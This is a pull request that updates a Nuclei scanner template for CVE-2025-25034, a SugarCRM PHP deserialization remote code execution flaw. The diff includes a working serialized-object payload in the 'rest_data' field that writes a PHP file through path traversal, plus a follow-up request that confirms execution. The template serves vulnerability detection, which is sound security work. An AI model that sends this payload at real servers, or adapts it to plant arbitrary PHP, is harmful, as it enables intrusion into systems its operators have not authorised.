### PR TITLE
Added CVE-2025-25034.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-25034.yaml
+++ b/http/cves/2025/CVE-2025-25034.yaml
@@ -5,25 +5,31 @@ info:
   author: Redmomn
   severity: critical
   description: |
-    SugarCRM prior to versions 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 is vulnerable to unauthenticated remote code execution via PHP Object Injection. The vulnerability exists in the SugarRestSerialize.php script, where the 'rest_data' POST parameter containing a PHP serialized string is passed unsanitized to the unserialize() PHP function. An attacker can submit a malicious serialized object to gain remote code execution. Earlier advisories and fixes were incomplete, leaving this vector open.
+    A PHP object injection vulnerability exists in SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 due to improper validation of PHP serialized input in the SugarRestSerialize.php script. The vulnerable code fails to sanitize the rest_data parameter before passing it to the unserialize() function. This allows an unauthenticated attacker to submit crafted serialized data containing malicious object declarations, resulting in arbitrary code execution within the application context. Although SugarCRM released a prior fix in advisory sugarcrm-sa-2016-001, the patch was incomplete and failed to address some vectors.
+  impact: |
+    Unauthenticated attackers can execute arbitrary code within the application context, potentially leading to full system compromise.
+  remediation: |
+    Update to versions 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, 7.7.1.0 or later.
   reference:
     - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
     - https://support.sugarcrm.com/resources/security/sugarcrm-sa-2016-001/
     - https://nvd.nist.gov/vuln/detail/CVE-2025-25034
-  impact: |
-    Successful exploitation of this vulnerability allows unauthenticated attackers to execute arbitrary PHP code on the affected server. This can result in full compromise of the system.
-  remediation: |
-    Update to the latest version.
+    - https://karmainsecurity.com/KIS-2016-07
+    - https://vulncheck.com/advisories/sugarcrm-php-deserialization-rce
   classification:
     cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
     cvss-score: 9.3
     cve-id: CVE-2025-25034
     cwe-id: CWE-502
+    epss-score: 0.00065
+    epss-percentile: 0.20665
   metadata:
     verified: true
-    vendor: SugarCRM
     fofa-query: app="sugarcrm"
-  tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauthenticated
+    max-request: 2
+  tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauth
+
+flow: http(1) && http(2)
 
 variables:
   num: '99999999'
@@ -38,6 +44,15 @@ http:
 
         method=login&input_type=Serialize&rest_data=O:14:"SugarCacheFile":23:{S:17:"\00*\00_cacheFileName";s:22:"../{{filepath}}";S:16:"\00*\00_cacheChanged";b:1;S:14:"\00*\00_localStore";a:1:{i:0;s:30:"<?php echo md5('{{num}}'); ?>";}}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(body)==0'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
       - |
         GET /{{filepath}} HTTP/1.1
         Host: {{Hostname}}
@@ -45,4 +60,6 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, md5(num)) && status_code_2 == 200'
+          - 'contains(body, md5(num))'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
Added CVE-2025-25034 details for SugarCRM PHP Object Injection vulnerability.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

<img width="1253" height="1163" alt="image" src="https://github.com/user-attachments/assets/f853a6f6-7f4d-4104-be1e-c6000ed86957" />


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)